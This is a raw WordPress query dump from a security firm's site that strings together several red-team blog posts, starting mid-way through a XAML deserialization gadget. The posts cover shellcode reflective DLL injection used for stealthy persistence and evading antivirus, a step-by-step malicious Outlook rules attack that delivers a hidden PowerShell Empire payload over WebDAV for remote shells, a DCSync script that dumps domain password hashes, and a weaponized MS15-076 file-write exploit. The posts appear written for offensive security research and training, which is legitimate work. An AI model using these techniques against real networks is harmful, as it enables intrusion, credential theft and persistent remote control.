    <ObjectDataProvider x:Key="setMethod" ObjectInstance="{x:Static c:ConfigurationManager.AppSettings}" MethodName ="Set">
        <ObjectDataProvider.MethodParameters>
            <s:String>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</s:String>
            <s:String>true</s:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>
[post_title] => Re-Animating ActivitySurrogateSelector [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => re-animating-activitysurrogateselector [to_ping] => [pinged] => [post_modified] => 2023-04-14 09:28:46 [post_modified_gmt] => 2023-04-14 14:28:46 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=23534 [menu_order] => 547 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 25106 [post_author] => 77 [post_date] => 2017-08-23 11:18:00 [post_date_gmt] => 2017-08-23 11:18:00 [post_content] =>

During our first offering of “Dark Side Ops II – Adversary Simulation” at Black Hat USA 2017, we quietly dropped a piece of our internal toolkit called sRDI. Shortly after, the full project was put on GitHub (https://github.com/monoxgas/sRDI) without much explanation.  I wanted to write a quick post discussing the details and use-cases behind this new functionality.

A Short History

Back in ye olde times, if you were exploiting existing code, or staging malicious code into memory, you used shellcode. For those rare few who still have the skill to write programs in assembly, we commend you. As the Windows API grew up and gained popularity, people found sanctuary in DLLs. C code and cross compatibility were very appealing, but what if you wanted your DLL to execute in another process? Well, you could try writing the file to memory and dropping a thread at the top, but that doesn’t work very well on packed PE files. The Windows OS already knows how to load PE files, so people asked nicely and DLL Injection was born. This involves starting a thread in a remote process to call “LoadLibrary()” from the WinAPI. This will read a (malicious) DLL from disk and load it into the target process. So you write some cool malware, save it as a DLL, drop it to disk, and respawn into other processes. Awesome!…well, not really. Anti-virus vendors caught on quick, started flagging more and more file types, and performing heuristic analysis. The disk wasn’t a safe place anymore!

Finally in 2009, our malware messiah Stephen Fewer (@stephenfewer) releases Reflective DLL Injection. As demonstrated, LoadLibrary is limited in loading only DLLs from disk. So Mr. Fewer said “Hold my beer, I’ll do it myself”. With a rough copy of LoadLibrary implemented in C, this code could now be included into any DLL project. The process would export a new function called “ReflectiveLoader” from the (malicious) DLL. When injected, the reflective DLL would locate the offset of this function, and drop a thread on it. ReflectiveLoader walks back through memory to locate the beginning of the DLL, then unpacks and remaps everything automatically. When complete, “DLLMain” is called and you have your malware running in memory.

Years went by and very little was done to update these techniques. Memory injection was well ahead of its time and allowed all the APTs and such to breeze past AV. In 2015, Dan Staples (@_dismantl) released an important update to RDI, called “Improved Reflective DLL Injection“. This aimed to allow an additional function to be called after “DLLMain” and support the passing of user arguments into said additional function. Some shellcode trickery and a bootstrap placed before the call to ReflectiveLoader accomplished just that. RDI is now functioning more and more like the legitimate LoadLibrary. We can now load a DLL, call its entry point, and then pass user data to another exported function. By the way, if you aren’t familiar with DLLs or exported functions, I recommend you read Microsoft’s overview.

Making shellcode great again

Reflective DLL injection is being used heavily by private and public toolsets to maintain that “in-memory” street cred. Why change things? Well…

  • RDI requires that your target DLL and staging code understand RDI. So you need access to the source code on both ends (the injector and injectee), or use tools that already support RDI.
  • RDI requires a lot of code for loading in comparison to shellcode injection. This compromises stealth and makes stagers easier to signature/monitor.
  • RDI is confusing for people who don’t write native code often.
  • Modern APT groups have already implemented more mature memory injection techniques, and our goal is to better emulate real-world adversaries.

The list isn’t as long as some reasons to change things, but we wanted to write a new version of RDI for simplicity and flexibility. So what did we do?

  1. To start, we read through some great research by Matt Graeber (@mattifestation) to convert primitive C code into shellcode. We rewrote the ReflectiveLoader function and converted the entire thing into a big shellcode blob. We now have a basic PE loader as shellcode.
  2. We wanted to maintain the advantages of Dan Staples’ technique, so we modified the bootstrap to hook into our new shellcode ReflectiveLoader. We also added some other tricks like a pop/call to allow the shellcode to get its current location in memory and maintain position independence.
  3. Once our bootstrap primitives were built, we implemented a conversion process into different languages (C, PowerShell, C#, and Python). This allows us to hook our new shellcode and a DLL together with the bootstrap code in any other tool we needed.

Once complete, the blob looks something like this:

When execution starts at the top of the bootstrap, the general flow looks like this:

  1. Get current location in memory (Bootstrap)
  2. Calculate and setup registers (Bootstrap)
  3. Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)
  4. Un-pack DLL and remap sections (RDI)
  5. Call DLLMain (RDI)
  6. Call exported function by hashed name (RDI) – Optional
  7. Pass user-data to exported function (RDI) – Optional

With that all done, we now have conversion functions that take in arbitrary DLLs, and spit out position independent shellcode. Optionally, you can specify arbitrary data to get passed to an exported function once the DLL is loaded (as Mr. Staples intended). On top of that, if you are performing local injection, the shellcode will return a memory pointer that you can use with GetProcAddressR() to locate additional exported functions and call them. Even with the explanation, the process can seem confusing to most who don’t have experience with the original RDI project, shellcode, or PE files, so I recommend you read existing research and head over to the GitHub repository and dig into the code: https://github.com/monoxgas/sRDI

Okay, so what?

“You can now convert any DLL to position independent shellcode at any time, on the fly.”

This tool is mainly relevant to people who write/customize malware. If you don’t know how to write a DLL, I doubt most of this applies to you. With that said, if you are interested in writing something more than a PowerShell script or Py2Exe executable to perform red-teaming, this is a great place to start.

Use case #1 – Stealthy persistence

  • Use server-side Python code (sRDI) to convert a RAT to shellcode
  • Write the shellcode to the registry
  • Setup a scheduled task to execute a basic loader DLL
  • Loader reads shellcode and injects (<20 lines of C code)

Pros: Neither your RAT nor your loader needs to understand RDI or be compiled with RDI. The loader can stay small and simple to avoid AV.

Use case #2 – Side loading

  • Get your sweet RAT running in memory
  • Write DLL to perform extra functionality
  • Convert the DLL to shellcode (using sRDI) and inject locally
  • Use GetProcAddressR to lookup exported functions
  • Execute additional functionality X-times without reloading DLL

Pros: Keep your initial tool more lightweight and add functionality as needed. Load a DLL once and use it just like any other.

Use case #3 – Dependencies

  • Read existing legitimate API DLL from disk
  • Convert the DLL to shellcode (using sRDI) and load it into memory
  • Use GetProcAddress to lookup needed functions

Pros: Avoid monitoring tools that detect LoadLibrary calls. Access API functions without leaking information. (WinInet, PSApi, TlHelp32, GdiPlus)

Conclusion

We hope people get good use out of this tool. sRDI has been a member of the SBS family for almost 2 years now and we have it integrated into many of our tools. Please make modifications and create pull-requests if you find improvements.

We’d love to see people start pushing memory injection to higher levels. With recent AV vendors promising more analytics and protections against techniques like this, we’re confident threat actors have already implemented improvements and alternatives that don’t involve high level languages like PowerShell or JScript.

@monoxgas

[post_title] => sRDI – Shellcode Reflective DLL Injection [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => srdi-shellcode-reflective-dll-injection [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:36:35 [post_modified_gmt] => 2021-04-27 14:36:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25106 [menu_order] => 608 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 25171 [post_author] => 77 [post_date] => 2015-12-04 12:55:00 [post_date_gmt] => 2015-12-04 12:55:00 [post_content] =>

Occasionally, we come across interesting scenarios that require thinking outside the box. For example: What if you’ve obtained a target user’s credentials (via responder.py, brute-forcing, sniffing, keylogging, etc.), but don’t have access to their workstation? This raises the question of whether a domain username and password could be useful without a workstation to authenticate against. Most organizations use Exchange for email, and make it externally accessible (via OWA or RPC over HTTPS). The AutoDiscover DNS record simplifies most of this process requiring a user to simply input his or her domain credentials into Outlook to setup the remote connection. Hopefully you can see where we’re going with this. If not, read on!

Anyone familiar enough with Outlook will know it has a “Rules and Alerts” section that allows the user to automate certain actions based on message criteria. This feature is particularly interesting because the rules sync between all Outlook installs via Exchange. Most of the available rules actions pertain to modifying the mailbox, moving messages, categorizing items, etc. However, a few more devious actions immediately stand out, namely “Start Application”.

This seems too easy! Sure enough, playing with the rule in the Outlook client highlights some pretty serious drawbacks. First, the target file needs to be locally accessible before it will save the rule. Second, it doesn’t appear to support arguments when starting the application. Poking around a bit more, we find the ability to import or export rules under the “Options” menu. Here is where we can have some fun! Let’s export a simple rule file and throw it into a hex editor.

Through the hex editor, we can find the data we’re interested in. We have the name of our rule, the text that our subject trigger is using, and the path of the file to execute. Experienced reverse engineers may notice that each text sequence is preceded by the length of the string, and the string itself is encoded with UTF-16LE. After spending some time reversing the file format, we built a python script to automate the process of modifying the rules file to execute an arbitrary malicious file instead of the one initially specified! By default, the script uses an email subject trigger rule to execute the file path specified. Like any good hacker script, it’s a little rough around the edges (e.g. no exception handling), but it’s much better than manually editing the .rwz files in a hex editor. It can be found here: https://gist.github.com/monoxgas/7fec9ec0f3ab405773fc

Note: The API Outlook uses is ShellExecute with the “open” verb when running the file, so technically any file extension with an action defined for “open” is valid. These can be found in the registry under HKEY_CLASSES_ROOT. This is also why arguments don’t work…for now. 

That’s cool, but we’re always looking for ways to weaponize techniques in real-world attack scenarios. That being said, the next challenge became finding a way to remotely leverage the capability to obtain initial access, or pivot around tough network segmentation. This is where UNC paths, SMB, and WebDAV come in handy.

  • Assuming you already had internal network access, you could host your malicious files on an open Samba share with Kali, or simply drop them on an existing public file share on the network.
  • If attempting initial access, the target network would need to allow port 445 outbound (more common than you might think), in which case you just host the file on a public server.
  • Similar to #2, but WebDAV (port 80) is used to deliver the payload.

Again, focusing on real-world attack scenarios, we opted for method #3, using an external WebDAV server running on port 80 (because everyone lets port 80 out) to deliver the payload.

Note: Performing this attack via the internet might generate a user prompt warning of execution from an untrusted location.

So let’s put all of this theory into practice and show an example attack.

The machines we’ll work with:

  • Target Workstation
    • On the internal network
    • Target user has Outlook running
  • Public Web Server
    • Internet facing server
    • Running WebDAV with Apache
    • Will deliver Powershell Empire as the payload
  • Windows VM
    • Used to connect to target user’s email account externally

Overview of the process:

  1. Install Apache and WebDAV modules. Setup a public share with anonymous access (public server)
  2. Run Empire and create listener/stager (public server)
  3. Build EXE wrapper to run PowerShell one-liner silently
  4. Build Outlook RWZ file
  5. Connect to target users email in Outlook and sync the malicious rule file (Windows VM)
  6. Send an email to trigger the Outlook rule
  7. Shellz! (target workstation)
  8. PROFIT???

Step 1 – Install Apache and WebDAV

Installing Apache and WebDAV will depend on your distro. In this demo, we used a base Ubuntu 14.04 install with a process similar to this. Here is a snippet from the 000-default.conf site config file to allow anonymous access to a WebDAV share.

In this case, I’m using “/var/www/webdav”. Just make sure proper permissions are set on that directory.

Step 2 – Setup the RAT

Powershell Empire (https://www.powershellempire.com) can be installed with a simple “git clone https://github.com/PowerShellEmpire/Empire.git”, then run “./setup/install.sh”. For this example, I just left the listener named “test” with a connecting port of 8080. Setup our one-liner using “usestager launcher <listener name>”

Step 3 – Build the payload

Alright, now that we have a RAT listener setup, with a PowerShell one-liner to deploy, and WebDAV server to host our files, we just need the file payload to deploy. This could be done a number of ways. I like to use “BAT to EXE Converter” from https://www.f2ko.de/en/b2e.php. It allows you to make an EXE for running any command line input you want. Just copy the PowerShell one-liner from Empire into a BAT file and compile it to an EXE. Don’t forget to make the application “invisible” to avoid a command prompt window popping up. Once it’s compiled, throw this EXE onto your WebDAV file share.

Step 4 – Build the rule

Using the rulz.py script mentioned earlier, create the malicious rules file.

Step 5 – Connect to Outlook

This part is the easiest of this whole process. We won’t cover this process in detail, but it should be pretty easy as most organizations have AutoDiscover via DNS setup.

Note: Although user credentials often match between domains and exchange, it is possible that they use separate passwords (especially in the case of Office 365).

Once you have the profile loaded, hop into the “Rules and Alerts” panel, hit Options, then Import.

Feel free to edit the rule after it’s imported and modify it to your pleasure. Hit Apply when you’re done and let Outlook sync the rule to Exchange.

Important: When modifying a rule that starts an application, Outlook may set “On this computer only”. Make sure to uncheck this before applying the rule!

Step 6 – Send an email

Correction, hopefully THIS is the easiest step in the process. Go ahead and shoot your target an email, either from themselves, or the address of your choosing. I like to close Outlook immediately after the message sends to make sure the local instance doesn’t interfere with the process.

Step 7 – Shellz!

This whole process can be lengthy, and a bit finicky, but nothing satisfies like popping shells using only Outlook and some credentials.

Don’t forget to clean up their Outlook rules when you are done.

What’s Next?

Like most good attacks, we aren’t really exploiting flaws, just abusing functionality to get reliable code execution. The biggest drawback right now is the inability to pass arguments when executing an application. This forces us to serve files over SMB or WebDAV which complicates the process a bit. While there are some caveats and prerequisites, Outlook rules still provide a promising entry point into a network, or around network segmentation.

[post_title] => Malicious Outlook Rules [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => malicious-outlook-rules [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:48:00 [post_modified_gmt] => 2021-04-27 14:48:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25171 [menu_order] => 656 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 25188 [post_author] => 77 [post_date] => 2015-10-02 13:05:00 [post_date_gmt] => 2015-10-02 13:05:00 [post_content] =>

Update: It was brought to our attention that we mistakenly forgot to credit a few of the researchers who contributed to the code used in this post. In fact, these contributors really did the heavy lifting and we simply combined various aspects of their work to create a hashdump script. Will Schroeder (@harmjoy), Joseph Bialek (@JosephBialek), Matt Graeber (@mattifestation), Vincent Le Toux (vincent.letoux [at] gmail.com), and Benjamin Delpy (@gentilkiwi) all contributed to this effort. Check the source for their specific contributions. We write a lot of code for internal use, and are still new at the process for public release. We apologize for the oversight!

This is a short blog post (and a script) to release a PowerShell invoker for DCSync. If you haven’t heard of “DCSync”, it is essentially a feature within Mimikatz that allows you to impersonate a domain controller to synchronize domain account credentials with other domain controllers. The underlying technology is obviously necessary so when a domain user changes his or her account password, the change gets synchronized across all domain controllers. Here’s the catch…the synchronization request doesn’t have to be made from an actual domain controller. Leveraging this “feature” in Active Directory, Mimikatz impersonates a domain controller to perform a password synchronization request to another domain controller. Add in some user enumeration and we can effectively perform a domain hashdump without ever actually being on a domain controller! Even better…on a recent assessment we found an organization had enabled the “Store passwords using reversible encryption” GPO. We were pleasantly surprised to find that DCSync not only pulled the hashes, but also the clear-text passwords for the accounts with that option enabled!

Now, there are a few noteworthy items. Of course there are some limitations to this. First (and hopefully this is obvious), you need to be a domain or enterprise administrator. Also, it may not be a good idea from an opsec perspective to run this on a non-domain controller host. Obviously, this is meant to synchronize DC to DC, not DC to workstation, or even DC to server. Sean Metcalf has a lot of good information on the opsec impact and even detection of this type of traffic here. Now on to the good stuff..

The PowerShell script leverages Invoke-ReflectivePEInjection with some help from the PowerView project to enumerate domain users. Basically, the script uses a DLL wrapper for the PowerKatz build of the Mimikatz project with an exported “powershell_reflective_mimikatz” function to execute the commands. Short synopsis:

  • Users and/or machines are enumerated from the network. (They are also passable as an argument.)
  • The DLL is loaded into memory, and the DCSync function location is found.
  • The DCSync command is generated and the function is called iteratively.
  • The output is parsed and formatted for your viewing and cracking pleasure.

Link to the ps1: https://gist.github.com/monoxgas/9d238accd969550136db

Here is the full help for the command:

NAME
    Invoke-DCSync

SYNOPSIS
    Uses dcsync from mimikatz to collect NTLM hashes from the domain.

SYNTAX
    Invoke-DCSync [[-Users] <Array[]>] [-GetComputers] [-OnlyActive] [-PWDumpFormat] [-AllData] []

DESCRIPTION
    Uses a mimikatz dll in memory to call dcsync against a domain. By default, it will enumerate all active domain users along with the krbtgt, and print out their current NTLM hash. Big ups to @harmj0y for the powerview project. The Get-NetUser and Get-NetComputer code is ripped for this script.

PARAMETERS
    -Users <Array[]>
        Optional, An array of usernames to query hashes for (Passable on the Pipeline). krbtgt will automatically get added

        Required?                    false
        Position?                    1
        Default value
        Accept pipeline input?       true (ByValue)
        Accept wildcard characters?

    -GetComputers []
        Will pull the machine hashes as well. Default is false

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -OnlyActive []
        Will only pull users whos account is active on the domain. Default is true

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -PWDumpFormat []
        Formats the output in 'user:id:lm:ntlm:::' format. Default is false

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -AllData []
        Prints out raw mimikatz output. Default is false

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".

INPUTS

OUTPUTS

    -------------------------- EXAMPLE 1 --------------------------
    >Invoke-DCSync -PWDumpFormat
    Returns all active user hashes in 'user:id:lm:ntlm:::' format.


    -------------------------- EXAMPLE 2 --------------------------

    >Invoke-DCSync -OnlyActive:$false -GetComputers
    Returns all user and computer object hashes in the domain


    -------------------------- EXAMPLE 3 --------------------------

    >Get-NetGroup -GroupName "EvilPeople" | % {$_.MemberName} | Invoke-DCSync
    Returns the user hashes for account in the EvilPeople group

[post_title] => Hashdump without the DC using DCSync (because we all wanted it) [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => invoke-dcsync-because-we-all-wanted-it [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:49:25 [post_modified_gmt] => 2021-04-27 14:49:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25188 [menu_order] => 658 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 25193 [post_author] => 77 [post_date] => 2015-08-12 13:16:00 [post_date_gmt] => 2015-08-12 13:16:00 [post_content] =>

A few weeks ago (July 14, 2015), Microsoft had a busy patch Tuesday fixing quite a few privilege escalation vulnerabilities. Among these was a bug in DCOM/RPC which allows for an NTLM authentication challenge to be reflected back to a listening TCP socket. This issue was found by James Forshaw (@tiraniddo) with the Google Security Research team. The details of this bug and potential exploit paths are covered in his write up here. Along with this write up came a PoC that utilized NTLM reflection, IStorage objects, a Junction, and some clever path trickery to get a SYSTEM process to write a file to ‘C:\Windows\ (2)’ without the user having admin privileges. Now this isn’t particularly useful if you are attempting to leverage this vulnerability to escalate privileges. So, naturally the goal became modifying the exploit to an arbitrary file write at any location on disk.

Luckily, Forshaw has also done research into Symbolic Links and Junctions which can be used to weaponize this exploit. Here is a link to his slides on the topic from SyScan’15 along with his GitHub code here.

Now the piece we want to extract from all of this is the unprivileged file level symbolic link tactic (CreateSymlink). Essentially this uses a junction in combination with a symbolic link written to the global namespace in \RPC Control\ to get a C:\Folder\FileA pointing to C:\FileB without administrative privileges. Let’s walk through what it takes to get a file written to ‘C:\Windows\System32\Evil.dll’.

  1. Make a directory junction from ‘C:\Windows\Temp\{Random}’ to ‘C:\Users\Public\Libraries\Sym’
  2. Make another junction from ‘\??\C:\Users\Public\Libraries\Sym’ to ‘\RPC Control\’
  3. Make a symlink from ‘\RPC Control\ (2)’ to ‘\??\C:\Windows\System32\Evil.dll’
  4. The exploit will attempt to write a file to ‘C:\Windows\Temp\{Random}/’ which points to ‘C:\Windows\System32\Evil.dll’

Note that steps 2 and 3 are performed together in the CreateSymlink project.

Modifying the PoC code with the above tricks, we can now copy any file to a privileged location. We’re calling the finished product ‘Trebuchet’.

You might be thinking, “So what? It’s just an arbitrary file write.” We’ll leave weaponization specifics up to the reader, but if you’re familiar with DLL hijacking, then privilege escalation shouldn’t be difficult from here. The full PoC code can be found here.

Some things to note:

  • The exploit can only be run once every 2-3 minutes. RPC gets held up by LocalSystem.
  • The Interop DLL must be in the same directory as the exploit (for now).
  • Only limited testing on Windows 7/8.1 x64 and x86 has been performed.
  • All of the licensed code belongs to Google and/or James Forshaw, and a big thanks to him for all the material and his great research.
  • Most of this code could be cleaned up and/or simplified.
[post_title] => Exploiting MS15-076 (CVE-2015-2370) [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-ms15-076-cve-2015-2370 [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:50:35 [post_modified_gmt] => 2021-04-27 14:50:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25193 [menu_order] => 659 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) ) [post_count] => 18 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 31572 [post_author] => 53 [post_date] => 2023-09-26 09:55:19 [post_date_gmt] => 2023-09-26 14:55:19 [post_content] =>
Watch Now

AI has taken the world by storm lately. From ChatGPT to automated spear phishing techniques, the security world has already seen changes in processes, automation, and threat detection - not to mention attack techniques! The recent surge of AI opens up opportunities for both defenders and adversaries alike. What can we build? What can we automate? How can we use AI to augment security to buy time and add another layer of defense to our enterprise?

In this AI-focused solutions forum, we’ll examine how AI will continue to change the security landscape. After all - tools for one are tools for many. Just as defenders benefit from AI capabilities, adversaries have found their own uses. Threat actors have found efficiencies using AI capabilities, from writing malware to discovering vulnerable systems. Defenders must be prepared for how AI will help bolster defenses while adversaries use it to ramp up their attacks.

Watch Nick Landers, VP of Research NetSPI, join the SANS team to discuss the risks, vulnerabilities, and benefits of rapidly introducing machine learning and artificial intelligence globally at the AI & ChatGPT Solutions Forum.

[wonderplugin_video iframe="https://youtu.be/lZCgXf3IW-U" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Artificial Intelligence & ChatGPT [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => artificial-intelligence-and-chatgpt [to_ping] => [pinged] => [post_modified] => 2023-12-05 10:25:00 [post_modified_gmt] => 2023-12-05 16:25:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31572 [menu_order] => 18 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 18 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 0e32e2debc0739c69443ae98f318fe85 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
Artificial Intelligence & ChatGPT
Nick Landers

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X